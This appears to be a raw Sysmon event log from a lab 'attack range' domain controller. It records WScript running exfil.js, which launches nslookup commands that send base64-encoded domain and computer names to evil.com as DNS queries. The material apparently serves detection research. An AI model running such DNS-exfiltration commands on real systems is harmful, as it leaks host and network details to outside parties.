10341000x8000000000000000207857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.697{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2E43-000000005F02}4232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.681{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2E43-000000005F02}4232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.681{2E1864BB-18E8-629A-2E43-000000005F02}42327780C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2D43-000000005F02}5556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.677{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2E43-000000005F02}4232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2D43-000000005F02}5556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.659{2E1864BB-18E0-629A-6742-000000005F02}3976512C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-2D43-000000005F02}5556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.662{2E1864BB-18E8-629A-2D43-000000005F02}5556C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzdu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.644{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbml.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-18E8-629A-2B43-000000005F02}64407284C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2C43-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.628{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2C43-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.612{2E1864BB-18E8-629A-2A43-000000005F02}2172988C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2C43-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.627{2E1864BB-18E8-629A-2C43-000000005F02}7432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-2A43-000000005F02}2172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbml.tmp 2>&1 354300x8000000000000000207837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.217{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62215-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62215-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50572- 354300x8000000000000000207834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50571- 354300x8000000000000000207833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50570- 354300x8000000000000000207832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.138{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50569- 354300x8000000000000000207831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.137{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50568- 354300x8000000000000000207830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.137{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50567- 354300x8000000000000000207829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.058{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50566- 354300x8000000000000000207828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50565- 354300x8000000000000000207827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50564- 354300x8000000000000000207826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50563- 10341000x8000000000000000207825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.597{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2B43-000000005F02}6440C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.581{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2B43-000000005F02}6440C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.581{2E1864BB-18E8-629A-2B43-000000005F02}64407284C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2A43-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2B43-000000005F02}6440C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 